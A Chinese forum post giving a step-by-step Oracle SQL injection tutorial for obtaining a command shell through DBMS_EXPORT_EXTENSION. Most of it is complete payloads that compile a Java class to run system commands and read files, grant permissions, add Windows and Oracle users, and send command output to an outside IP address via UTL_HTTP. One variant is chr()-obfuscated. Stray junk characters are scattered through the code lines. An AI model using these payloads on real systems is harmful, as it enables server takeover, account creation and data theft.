
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在 web 上的 SQL Plus 执行的;在 web 注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 " 'a'|| " 是为了让语句返回 true 值)
语句有点长,可能要用 POST 提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 Oracle 上创建 Java 包 LinxUtil,里面有两个函数:runCMD 用于执行系统命令,readFile 用于读取文件:
! k/ [7 r$ U; V( l# y/xxx.jsp?id=1 and '1'<>'a'||(
: H8 j/ o+ S4 M6 w" L9 Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 \9 Z; T  p/ O0 P0 M
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
. }, N6 [9 F; wnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: G3 \4 V' ?! D; M2 ?! K, \
}'''';END;'';END;--','SYS',0,'1',0) from dual
* g4 t2 E: S3 w7 D) 3 E, Q6 p' V7 z, R  V
------------------------
如果 URL 有长度限制,可以把 readFile() 函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||( ; `; T/ o7 @3 H& I8 O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 _" @" i0 B. R1 Y& ~7 L7 d9 A
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader($ ^5 q. s. ]! X
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: v  ]% y3 t) x. A2 g# A) B1 G
}'''';END;'';END;--','SYS',0,'1',0) from dual
; \2 P8 I) F& z! d. u5 P)
同时把后面步骤提到的对 readFile() 的处理语句去掉。
------------------------------
2.赋 Java 权限
" z4 V7 H; T2 K4 ]/ j: mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
" V8 p; I! O, ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* ?: I  A1 A3 U& I4 Y
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual8 v8 G+ \- g# o+ A: P
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( I: h+ t: p" Y! _; k0 _
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋 public 执行函数的权限
3 @- S+ n6 L! [+ @+ {) Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
6 u$ l$ j/ R# R# N& N" ~7 bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
( r  u/ s- ]; ~% |; }- R! P8 _and '1'<>'11'||( , V( l3 C/ O; b% E# ^' H6 o
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' / h& p( {6 n% _( y8 q+ G
)
* E9 w# s; T8 ]" iand '1'<>( 2 t2 z: M" w7 I1 g
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
4 {& |: n3 i6 G: b)
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
3 ?5 b' k/ E. ~8 u4 dselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
2 B0 R( i) `  v3 k( `" b/ V+ W
6 l( d( J: e2 w)
$ w2 J0 Z: S1 k% _8 G" E% t! s/xxx.jsp?id=1 and '1'<>(
: }2 r/ @5 l& n0 vselect  sys.LinxReadFile('c:/boot.ini') from dual
; n9 J+ D2 r1 N: y7 t2 ]+ b) B7 J% d5 {+ y
)
注意 sys.LinxReadFile() 返回的是 varchar 类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果,可以用 union:
* i6 n+ I9 q- T) ?, z1 Q+ @% g/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request():
. U6 n; A  [# K3 x. h/xxx.jsp?id=1 and '1'<>(
: V' j% `! k; F- t$ f; d4 ZSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
' ^6 |& ^! M: `$ M( R) 5 B, c+ ^! ]. v7 ]
/xxx.jsp?id=1 and '1'<>(
! ^/ p( O: f6 W. |4 h: tSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual2 S1 n  T$ Z5 f$ B
)   o: X- }/ Q9 ]) `& f  a4 B3 T
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交 HTTP 请求;用 utl_encode.base64_encode 也可以。
--------------------
6.内部变化
通过以下命令可以查看 all_objects 表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ \. x3 W; m+ t- j0 ]" V
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建 oracle 帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' Z0 Z' W/ O* w) i, ]: o
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual+ f* ~9 x! s- c2 ~" ?
即:
8 X# I5 L6 m- S( [0 B: tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
; p6 ]' z/ |' L5 f% Fchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
$ d6 X/ I+ p3 X. {6 g1<>( 4 ?' |5 q3 e/ u& h3 s/ X- S
select user_id from all_users where username='LINXSQL'
( v5 R2 U% T5 X# S% H# H0 v) 1 F+ _# [6 R4 u7 u: K/ M9 G! V7 W
给 linxsql 连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% v: c% Y9 r3 k$ C! b- L/ D
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual + N& H" A" l9 ]/ M
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% }' M+ A, c. y
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数 Linx_query(),执行成功的话返回数值 "1";但权限是继承的,可能仅仅是 public 权限,作用似乎不大,真要用的话可以考虑 grant dba to 当前的 User:
1.jsp?id=1 and '1'<>( # q! O# c! W! a. t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) Z, j: o4 Y; ~0 W6 wcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
3 `8 ^& m6 x/ x5 i. D) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE: r& ^7 k- r1 M/ ~$ [2 H* R
 )